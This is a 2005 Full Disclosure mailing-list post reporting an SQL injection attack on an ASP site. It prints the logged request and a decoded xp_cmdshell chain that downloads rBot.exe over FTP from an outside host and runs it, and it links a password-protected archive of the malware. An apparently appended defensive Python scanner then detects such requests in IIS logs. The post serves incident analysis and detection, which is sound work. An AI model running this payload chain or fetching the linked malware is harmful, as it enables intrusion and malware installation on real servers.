Full Disclosure mailing list archives
SQL injection worm ?
From: "Maxime Ducharme" <mducharme () cybergeneration com>
Date: Wed, 5 Jan 2005 12:22:54 -0500
Hi list, we received a particular SQL injection attack on one of our sites. Attack looks like:

2005-01-05 14:39:20 24.164.202.24 - W3SVCX SRVNAME x.x.x.x 80 GET /Nouvelles.asp id_nouvelle=377';%65%78%65%63%20%4D%41%53%54%45%52..%78%70%5F%63%6D%64%73%68%65%6C%6C%20'mkdir%20%25systemroot%25%5Csystem32%5CMacromed%5Clolx%5C';%65%78%65%63%20%4D%41%53%54%45%52..%78%70%5F%63%6D%64%73%68%65%6C%6C%20'echo%20open%20217.199.183.122%2021%20%3E%3E%20%25systemroot%25%5Csystem32%5CMacromed%5Clolx%5Cblah.jkd';%65%78%65%63%20%4D%41%53%54%45%52..%78%70%5F%63%6D%64%73%68%65%6C%6C%20'echo%20USER%20hahajk%20hahaowned%20%3E%3E%20%25systemroot%25%5Csystem32%5Cmacromed%5Clolx%5Cblah.jkd';%65%78%65%63%20%4D%41%53%54%45%52..%78%70%5F%63%6D%64%73%68%65%6C%6C%20'echo%20get%20rBot.exe%20%25systemroot%25%5Csystem32%5CMacromed%5Clolx%5Carcdlrde.exe%20%3E%3E%20%25systemroot%25%5Csystem32%5CMacromed%5Clolx%5Cblah.jkd';%65%78%65%63%20%4D%41%53%54%45%52..%78%70%5F%63%6D%64%73%68%65%6C%6C%20'echo%20quit%20%3E%3E%20%25systemroot%25%5Csystem32%5CMacromed%5Clolx%5Cblah.jkd';%65%78%65%63%20%4D%41%53%54%45%52..%78%70%5F%63%6D%64%73%68%65%6C%6C%20'ftp.exe%20-i%20-n%20-v%20-s:%25systemroot%25%5Csystem32%5CMacromed%5Clolx%5Cblah.jkd';%65%78%65%63%20%4D%41%53%54%45%52..%78%70%5F%63%6D%64%73%68%65%6C%6C%20'del%20%25systemroot%25%5Csystem32%5CMacromed%5Clolx%5Cblah.jkd';%65%78%65%63%20%4D%41%53%54%45%52..%78%70%5F%63%6D%64%73%68%65%6C%6C%20'%25systemroot%25%5Csystem32%5CMacromed%5Clolx%5Carcdlrde.exe'--|17|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_''. 500 0 0 1395 570 HTTP/1.1 attacked.web.site.com - - -

HTTP request contains only 2 fields (beside HTTP method):

Connection: Keep-Alive
Host: attacked.web.site.com

(I obviously replaced the name of the site.)
Decoded SQL injection looks like:

exec MASTER..xp_cmdshell 'mkdir %systemroot%\system32\Macromed\lolx\';
exec MASTER..xp_cmdshell 'echo open y.y.y.y 21 >> %systemroot%\system32\Macromed\lolx\blah.jkd';
exec MASTER..xp_cmdshell 'echo USER hahajk hahaowned >> %systemroot%\system32\macromed\lolx\blah.jkd';
exec MASTER..xp_cmdshell 'echo get rBot.exe %systemroot%\system32\Macromed\lolx\arcdlrde.exe >> %systemroot%\system32\Macromed\lolx\blah.jkd';
exec MASTER..xp_cmdshell 'echo quit >> %systemroot%\system32\Macromed\lolx\blah.jkd';
exec MASTER..xp_cmdshell 'ftp.exe -i -n -v -s:%systemroot%\system32\Macromed\lolx\blah.jkd';
exec MASTER..xp_cmdshell 'del %systemroot%\system32\Macromed\lolx\blah.jkd';
exec MASTER..xp_cmdshell '%systemroot%\system32\Macromed\lolx\arcdlrde.exe'--

y.y.y.y is a foreign IP in Europe which hosts an FTP and a WWW server. I sent a notice to this site's sysadmin about the situation. I have been able to connect to this FTP with the account hahajk/hahaowned (which does not seem legit to me ...) and download suspicious files. I mirrored them here: http://www.cybergeneration.com/security/2005.01.05/rbot.exe_ftp.zip (zip pass is 968goyw439807r3qw).

24.164.202.24 is on rr.com networks, they have also been advised.

I know rbot.exe is known to be the Randex worm, but I'd like to have some other results / analysis. I also found a "test.asp" file which contains the Spybot worm.

Weird thing is, I searched for this host's activity on every server and every firewall we run, and I only see 1 TCP connection which is the prepared SQL injection attack, nothing else.

Anybody see similar activity? I'm asking since I want to know if we are targeted by someone or by a worm like Santy that uses search engines to find vulnerable ASP scripts.

Thanks in advance

Happy new year to everyone!

Maxime Ducharme
Programmer / Network security specialist

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
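The request above hides `exec MASTER..xp_cmdshell` behind percent-encoding, so a log search for the literal string misses it. The script below is an added example (it is not part of Maxime's post and not a tool he mentions) showing how a defender would sweep IIS W3C extended logs for this class of request: it takes the cs-uri-query column, percent-decodes it until it stops changing (to catch double encoding), and matches a handful of indicators such as `xp_cmdshell`, `exec master..`, a quote followed by `;` or `--`, and the ODBC error text that IIS appends to the query field as `|line|errcode|message` when the ASP page throws. The default column layout is an assumption taken from the 21-column line in the post and is overridden by the log's own `#Fields:` directive; the two sample log lines are constructed, not taken from the post, and the flagged one carries only a harmless `dir` in place of the real payload.

```python
import re
from urllib.parse import unquote

# Column layout assumed for logs without a "#Fields:" directive; it matches the
# 21-column line in the post above. A "#Fields:" line in the log overrides it.
DEFAULT_FIELDS = (
    "date time c-ip cs-username s-sitename s-computername s-ip s-port "
    "cs-method cs-uri-stem cs-uri-query sc-status sc-substatus sc-win32-status "
    "sc-bytes cs-bytes cs-version cs-host cs(User-Agent) cs(Cookie) cs(Referer)"
).split()

# Indicators checked against the lower-cased, fully percent-decoded query string.
INDICATORS = {
    "xp_cmdshell":       re.compile(r"xp_cmdshell"),
    "exec master":       re.compile(r"\bexec\s+master\.\."),
    "quote+semicolon":   re.compile(r"'\s*;"),          # closes the intended literal
    "quote+comment":     re.compile(r"'\s*--"),         # comments out the rest of the query
    "odbc syntax error": re.compile(r"80040e14|incorrect_syntax"),  # app leaks SQL errors
}


def full_decode(value, max_rounds=3):
    """Percent-decode until the string stops changing (catches double encoding)."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def inspect_query(raw_query):
    """Return (decoded query, list of indicator names that matched)."""
    decoded = full_decode(raw_query).lower()
    hits = [name for name, rx in INDICATORS.items() if rx.search(decoded)]
    return decoded, hits


def scan_log(lines, fields=None):
    """Walk W3C extended log lines; return one alert dict per suspicious request."""
    fields = list(fields or DEFAULT_FIELDS)
    alerts = []
    for line in lines:
        line = line.rstrip("\r\n")
        if line.startswith("#Fields:"):
            fields = line.split(":", 1)[1].split()   # honour the log's own layout
            continue
        if not line or line.startswith("#"):
            continue
        rec = dict(zip(fields, line.split(" ")))
        decoded, hits = inspect_query(rec.get("cs-uri-query", "-"))
        if hits:
            alerts.append({
                "c-ip": rec.get("c-ip"),
                "uri": rec.get("cs-uri-stem"),
                "status": rec.get("sc-status"),
                "hits": hits,
                "decoded": decoded,
            })
    return alerts


# Constructed sample log (not from the post): one ordinary request and one
# request carrying a percent-encoded xp_cmdshell call, with the
# "|line|errcode|message" tail IIS appends to the query field on an ASP error.
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 6.0
#Fields: date time c-ip cs-username s-sitename s-computername s-ip s-port cs-method cs-uri-stem cs-uri-query sc-status sc-substatus sc-win32-status sc-bytes cs-bytes cs-version cs-host cs(User-Agent) cs(Cookie) cs(Referer)
2005-01-05 14:38:01 10.0.0.7 - W3SVC1 WEB01 192.0.2.10 80 GET /Nouvelles.asp id_nouvelle=377 200 0 0 8120 410 HTTP/1.1 www.example.com Mozilla/4.0 - -
2005-01-05 14:39:20 198.51.100.23 - W3SVC1 WEB01 192.0.2.10 80 GET /Nouvelles.asp id_nouvelle=377';%65%78%65%63%20%4D%41%53%54%45%52..%78%70%5F%63%6D%64%73%68%65%6C%6C%20'dir'--|17|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_''. 500 0 0 1395 570 HTTP/1.1 www.example.com - - -
"""

if __name__ == "__main__":
    for alert in scan_log(SAMPLE_LOG.splitlines()):
        print(f"{alert['c-ip']} {alert['uri']} status={alert['status']} hits={alert['hits']}")
        print("  decoded:", alert["decoded"][:120])
```

Run against a real log directory, the useful output is the pair of c-ip and decoded query: a 500 with the ODBC error tail but no injection indicators still means the application is echoing SQL errors to the client, which is what made the attacker's blind probing cheap in the first place.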
Current thread:
- SQL injection worm ? Maxime Ducharme (Jan 06)
- Re: SQL injection worm ? bugtraq (Jan 05)
- Re: Re: SQL injection worm ? Willem Koenings (Jan 06)
- Re: [Dshield] SQL injection worm ? Maxime Ducharme (Jan 19)
- Re: SQL injection worm ? bugtraq (Jan 05)